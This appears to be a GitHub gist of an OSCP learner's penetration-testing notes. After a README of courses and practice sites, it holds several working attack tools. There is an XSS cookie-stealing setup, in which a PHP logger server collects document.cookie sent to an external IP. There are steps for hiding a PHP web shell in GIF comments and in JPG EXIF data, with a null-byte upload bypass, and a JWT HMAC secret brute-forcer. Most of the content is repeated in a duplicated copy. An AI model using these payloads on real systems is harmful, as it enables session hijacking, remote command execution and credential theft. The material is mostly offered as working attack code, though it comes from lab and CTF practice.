pgrabarczyk/CookieStealer_UbuntuPHP.sh

## README.md

      
    Raw
  

              README.md
            
          
    OSCP

BURP

https://www.udemy.com/course/burp-suite/learn/lecture/4170198#overview
Kali Linux

https://linuxacademy.com/cp/modules/view/id/274
HandsOn Exercises

OverTheWire.org

Bandit From 0 to 34
Natas From 0 to 25.. (not finished)
Root-me.org

https://www.root-me.org/pgrabarczyk?lang=en
Others

Security Plus

https://www.udemy.com/course/comptia-security-certification-sy0-501-the-total-course/
AWS Certified Security - Specialty Certification

https://linuxacademy.com/cp/modules/view/id/203
Links

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
https://github.com/jaalto/external-sf--crunch-wordlist/blob/master/charset.lst

  
## CookieStealer_UbuntuPHP.sh
#!/bin/bash
#
# Sample1:
# <script type="text/javascript">
# document.location='http://1.1.1.1/index.php?p='+document.cookie;
# </script>
# Sample2:
# <script type="text/javascript">
# var xGet = new XMLHttpRequest(); xGet.open("GET", 'http://1.1.1.1/index.php?p='+document.cookie, true); xGet.send(null);
# </script>

sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get install -y php

cat >index.php <<EOL
<?php
  \$param = \$_GET["p"];
  \$file = fopen('log.txt', 'a');
  fwrite(\$file, \$param . "\n\n");
?>
EOL

sudo service apache2 stop
sudo php -S 0.0.0.0:80

## GIT_Null_Byte.md

      
    Raw
  

              GIT_Null_Byte.md
            
          
Get a GIF (image.gif)
Get a PHP backdoor locate simple-backdoor.php && cp /usr/share/webshells/php/simple-backdoor.php .
gifsicle --comment "`tr '\n' ' ' < simple-backdoor.php`" < image.gif > image_backdoor.phpA.gif
(confirm script is in GIF head image_backdoor.phpA.gif)
Upload with intercept ON. Find filename in HEX, then update 41 (A) to 00 (NULL)


## HashtopolisClientUbuntu
HASTOPOLIS_IP=127.0.0.1

sudo su # Password
exit
sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get install -y python3-pip ocl-icd-libopencl1 ocl-icd-dev ocl-icd-opencl-dev
pip3 install requests psutil
mkdir hashtopolis && cd hashtopolis
wget http://${HASTOPOLIS_IP}/agents.php?download=1 -O hashtopolis.zip

mkdir intel && cd intel
wget http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/15532/l_opencl_p_18.1.0.015.tgz -O intel.tgz
tar zxvf intel.tgz
cd l_open... sudo ./install.sh
cd ../..
python3 hashtopolis.zip

#http://${HASTOPOLIS_IP}/api/server.php
#Voucher from server

## JPG_Upload.md

      
    Raw
  

              JPG_Upload.md
            
          
    #sudo apt install libimage-exiftool-perl
find image.jpg in web
exiftool -DocumentName="<h1>Hello<br><?php if (isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '<pre>';} __halt_compiler();?></h1>" image.jpg
	
mv image.jpg dangerous.php.jpg
file dangerous.php.jpg # should be jpeg
exif dangerous.php.jpg # check document name

execute uploaded file with
?cmd=whoami


## JWT cracker HMAC-SHA512.sh
# /bin/bash
#
# First I used hashcat:
# hashcat -a 3 -m 16500 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...' --force -o hashcat.result
#
# But hashcat found wrong result (should be 'lol' I got 'sud')
#
# So I've written this bash script
# First ensure it's HMAC-SHA512 - it can be easy changed to others HMAC-SHA...
# set your hash goal, set header and payload then execute:
# ./gen_JWT.sh wordlist_1-4_azAZ09 &
# ./gen_JWT.sh rockyou.txt &
# then check results:
# 18742/14344392
# 16103/1727604
# Found! lol
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...
# Found! lol
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...
#
# It's much slower than hascat but works

goal="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6BrtP-Y3A-vQXPY9jAh_d0E6L4IUjL65CvmEjgdTZyr2ag-TM-glH6EYKGgO3dBYbhblaPQsbeClcw"

payload_input='{"role":"guest"}'
jwt_header=$(echo -n '{"typ":"JWT","alg":"HS512"}' | base64 | sed s/\+/-/g | sed 's/\//_/g' | sed -E s/=+$//)
payload=$(echo -n "${payload_input}" | base64 | sed s/\+/-/g |sed 's/\//_/g' |  sed -E s/=+$//)

input_file="$1"
log_file="${input_file}.log"

lines=$(wc -l "${input_file}" | cut -d' ' -f1)
index=0
while IFS= read -r line
do
  secret="${line}"

  hexsecret=$(echo -n "$secret" | xxd -p | paste -sd "")
  hmac_signature=$(echo -n "${jwt_header}.${payload}" |  openssl dgst -sha512 -mac HMAC -macopt hexkey:$hexsecret -binary | base64  | sed s/\+/-/g | sed 's/\//_/g' | sed -E s/=+$// )

  hmac_signature=$(echo -n $hmac_signature | sed 's/[[:blank:]]//g')
  jwt="${jwt_header}.${payload}.${hmac_signature}"
  index=$((index+1))
  [[ "${jwt}" == "${goal}" ]] && echo "Found! $secret" &>> "${log_file}"  && echo $jwt &>> "${log_file}" && return 0 || echo "${index}/${lines}" &> "${log_file}"

done < "$input_file"

echo "Sorry not found password in $input_file" &>> "${log_file}"
	#!/bin/bash
	#
	# Sample1:
	# <script type="text/javascript">
	# document.location='http://1.1.1.1/index.php?p='+document.cookie;
	# </script>
	# Sample2:
	# <script type="text/javascript">
	# var xGet = new XMLHttpRequest(); xGet.open("GET", 'http://1.1.1.1/index.php?p='+document.cookie, true); xGet.send(null);
	# </script>

	sudo apt-get update
	sudo apt-get upgrade -y
	sudo apt-get install -y php

	cat >index.php <<EOL
	<?php
	\$param = \$_GET["p"];
	\$file = fopen('log.txt', 'a');
	fwrite(\$file, \$param . "\n\n");
	?>
	EOL

	sudo service apache2 stop
	sudo php -S 0.0.0.0:80
	HASTOPOLIS_IP=127.0.0.1

	sudo su # Password
	exit
	sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get install -y python3-pip ocl-icd-libopencl1 ocl-icd-dev ocl-icd-opencl-dev
	pip3 install requests psutil
	mkdir hashtopolis && cd hashtopolis
	wget http://${HASTOPOLIS_IP}/agents.php?download=1 -O hashtopolis.zip

	mkdir intel && cd intel
	wget http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/15532/l_opencl_p_18.1.0.015.tgz -O intel.tgz
	tar zxvf intel.tgz
	cd l_open... sudo ./install.sh
	cd ../..
	python3 hashtopolis.zip

	#http://${HASTOPOLIS_IP}/api/server.php
	#Voucher from server
	# /bin/bash
	#
	# First I used hashcat:
	# hashcat -a 3 -m 16500 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...' --force -o hashcat.result
	#
	# But hashcat found wrong result (should be 'lol' I got 'sud')
	#
	# So I've written this bash script
	# First ensure it's HMAC-SHA512 - it can be easy changed to others HMAC-SHA...
	# set your hash goal, set header and payload then execute:
	# ./gen_JWT.sh wordlist_1-4_azAZ09 &
	# ./gen_JWT.sh rockyou.txt &
	# then check results:
	# 18742/14344392
	# 16103/1727604
	# Found! lol
	# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...
	# Found! lol
	# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...
	#
	# It's much slower than hascat but works

	goal="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6BrtP-Y3A-vQXPY9jAh_d0E6L4IUjL65CvmEjgdTZyr2ag-TM-glH6EYKGgO3dBYbhblaPQsbeClcw"

	payload_input='{"role":"guest"}'
	jwt_header=$(echo -n '{"typ":"JWT","alg":"HS512"}' \| base64 \| sed s/\+/-/g \| sed 's/\//_/g' \| sed -E s/=+$//)
	payload=$(echo -n "${payload_input}" \| base64 \| sed s/\+/-/g \|sed 's/\//_/g' \| sed -E s/=+$//)

	input_file="$1"
	log_file="${input_file}.log"

	lines=$(wc -l "${input_file}" \| cut -d' ' -f1)
	index=0
	while IFS= read -r line
	do
	secret="${line}"

	hexsecret=$(echo -n "$secret" \| xxd -p \| paste -sd "")
	hmac_signature=$(echo -n "${jwt_header}.${payload}" \| openssl dgst -sha512 -mac HMAC -macopt hexkey:$hexsecret -binary \| base64 \| sed s/\+/-/g \| sed 's/\//_/g' \| sed -E s/=+$// )

	hmac_signature=$(echo -n $hmac_signature \| sed 's/[[:blank:]]//g')
	jwt="${jwt_header}.${payload}.${hmac_signature}"
	index=$((index+1))
	[[ "${jwt}" == "${goal}" ]] && echo "Found! $secret" &>> "${log_file}" && echo $jwt &>> "${log_file}" && return 0 \|\| echo "${index}/${lines}" &> "${log_file}"

	done < "$input_file"

	echo "Sorry not found password in $input_file" &>> "${log_file}"